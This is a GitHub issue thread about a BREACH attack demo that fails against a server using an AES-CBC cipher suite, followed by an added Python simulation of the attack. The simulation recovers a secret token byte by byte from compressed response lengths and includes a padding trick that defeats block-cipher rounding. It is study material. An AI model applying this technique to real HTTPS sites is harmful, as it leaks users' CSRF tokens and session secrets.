huffman coding check returning the same byte length #3

jasekiw opened this issue Jul 25, 2018 · 8 comments

jasekiw commented Jul 25, 2018

I cloned the repo and ran it locally.
Issue 1: The target IP in the SSL proxy does not match malbot.net. This was easy enough to update in the source code.

Issue 2: The part that deals with the huffman coding by making two requests, one with the character before the padding and the other with the character after the padding is getting the same response size. The code that deals with this is in BREACH Basic.cs at the method IsCorrectGuess.

I know gzip is working because the response comes back encoded. I decoded the response and checked the values and they are inserted into the page correctly.

I am trying to replicate this attack for a computer security project.

jasekiw commented Jul 25, 2018

I noticed when I test in the browser it gets around 2584 bytes vs in the console it gets around 2922 bytes. This is quite a large difference. I wonder if I'm on to something.

jasekiw commented Jul 25, 2018

When decoding the response from the request https://malbot.net/poc/?param1=value1request_token='b{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}@

The reflected value becomes <input type="hidden" target="https://malbot.net/poc/?param1=value1request_token='b%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D%7B%7D@">
It seems the padding is getting encoded as HTML entities. Is this supposed to happen?

jasekiw commented Jul 25, 2018

It seems after every request I always get the same byte response of 2906. I've adjusted the request url and the response bytes are the same. I'm thinking the calculation of the response bytes might be the issue.

jasekiw commented Jul 25, 2018

I'm wondering if it is negotiating a block cipher instead of a stream cipher and this is the cause of the same response length.

jasekiw commented Jul 25, 2018

So, malbot.net is using a block cipher. It negotiates TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA. Which breaks this repo.

samrocketman commented

It says in the README this doesn’t support block ciphers.

jasekiw commented Jul 27, 2018

@samrocketman That was the point of my comment. This is supposed to be a working demo with the website. I found out last night that getting a stream cipher to work is extremely difficult because any newer operating system rejects it. I got around the block cipher, but it's not that great of an implementation. If I come up with a decent solution I will try to make a PR.
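The two measurements this thread argues about, simulated offline as an added example (this is not code from the BREACH repository and not part of any comment above). It shows the "Huffman check" that IsCorrectGuess performs, reflecting guess-then-padding and padding-then-guess and comparing compressed sizes, and why a suite such as TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA returns the same byte length: the record is padded to a 16-byte block, which swallows the one-byte difference until the attacker pads the response onto a block boundary. The page template, the secret, the alphabet and the filler characters are constructed for the example, and zlib's fixed Huffman tables are forced so that the size arithmetic is exact; a real server uses dynamic tables, which is the noise the two-request check is meant to cancel.

```python
import zlib

BLOCK = 16     # AES block size
MAC_LEN = 20   # HMAC-SHA1 tag length of a *_CBC_SHA suite

# Constructed fixtures: a page that reflects a request parameter next to a
# secret the attacker recovers one byte at a time.
SECRET = "request_token=5f3a9c1e"
ALPHABET = "0123456789abcdef"
PADDING = "{}" * 20   # characters that occur nowhere else in the page
# Distinct bytes that occur nowhere in the page: each costs exactly one
# 8-bit literal and never forms an LZ77 match ('E' is left out: "Echo").
FILLER_CHARS = "ABCDFGHIJKLMNOPQRSTUVWXYZ"

PAGE = (
    "<html><body>\n"
    '<input type="hidden" name="csrf" value="%s">\n'
    "<p>Echo: %s</p>\n"
    "</body></html>\n"
)


def render(reflected: str) -> bytes:
    """Server side: the page body with the secret and the reflected value."""
    return (PAGE % (SECRET, reflected)).encode()


def compressed_len(body: bytes) -> int:
    """What a stream-cipher record leaks: the compressed length itself.
    Z_FIXED forces static Huffman tables so one extra literal is one byte."""
    z = zlib.compressobj(6, zlib.DEFLATED, 15, 8, zlib.Z_FIXED)
    return len(z.compress(body) + z.flush())


def cbc_record_len(body: bytes) -> int:
    """What an AES-CBC-SHA record leaks: compressed body + MAC + at least one
    padding byte, rounded up to a whole block, behind the explicit IV."""
    n = compressed_len(body) + MAC_LEN + 1
    return BLOCK + (n + BLOCK - 1) // BLOCK * BLOCK


def sizes(known, guess, filler="", measure=compressed_len):
    """The two requests of the check: <guess><padding> and <padding><guess>."""
    before = measure(render(known + guess + PADDING + filler))
    after = measure(render(known + PADDING + guess + filler))
    return before, after


def is_correct_guess(known, guess, filler="", measure=compressed_len):
    """A correct guess extends the LZ77 match against the secret by one byte,
    so the first body is smaller; a wrong guess gives identical sizes."""
    before, after = sizes(known, guess, filler, measure)
    return before < after


def recover_next_char(known, filler="", measure=compressed_len):
    """Sweep the alphabet and accept only an unambiguous single hit."""
    hits = [c for c in ALPHABET if is_correct_guess(known, c, filler, measure)]
    return hits[0] if len(hits) == 1 else None


def align_to_block(known, measure=cbc_record_len):
    """Block-cipher work-around: grow an incompressible filler one byte at a
    time until the reference record grows by a block. The reference body then
    sits one byte past a block boundary, so the one-byte-shorter body of a
    correct guess falls into the previous block and is visible again. The
    <padding><guess> form is the reference because its size does not depend
    on the guess."""
    base = measure(render(known + PADDING + ALPHABET[0]))
    for k in range(1, BLOCK + 1):
        filler = FILLER_CHARS[:k]
        if measure(render(known + PADDING + ALPHABET[0] + filler)) > base:
            return filler
    return None


def recover(prefix, count, measure=compressed_len, block_cipher=False):
    """Recover count bytes after prefix. Stops at the first byte the check
    cannot decide, e.g. when the longer match moves to a DEFLATE length code
    with more extra bits and the saving no longer rounds to a whole byte."""
    known = prefix
    for _ in range(count):
        filler = align_to_block(known, measure) if block_cipher else ""
        if filler is None:
            break
        nxt = recover_next_char(known, filler, measure)
        if nxt is None:
            break
        known += nxt
    return known


if __name__ == "__main__":
    print("stream cipher:      ", recover("request_token=", 8))
    print("AES-CBC, no filler: ", recover("request_token=", 8, cbc_record_len))
    print("AES-CBC, aligned:   ", recover("request_token=", 8, cbc_record_len, True))
```

The first run recovers bytes from the compressed length alone; the second, measuring the padded CBC record with no filler, mostly sees equal lengths, which is the symptom reported above; the third re-aligns the response before every byte. Only the equality of the two sizes for wrong guesses is an exact property of the token multiset; the strict inequality for the right guess depends on the saved bits crossing a byte (or block) boundary, so a real attack repeats or re-pads when a sweep yields no single hit.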
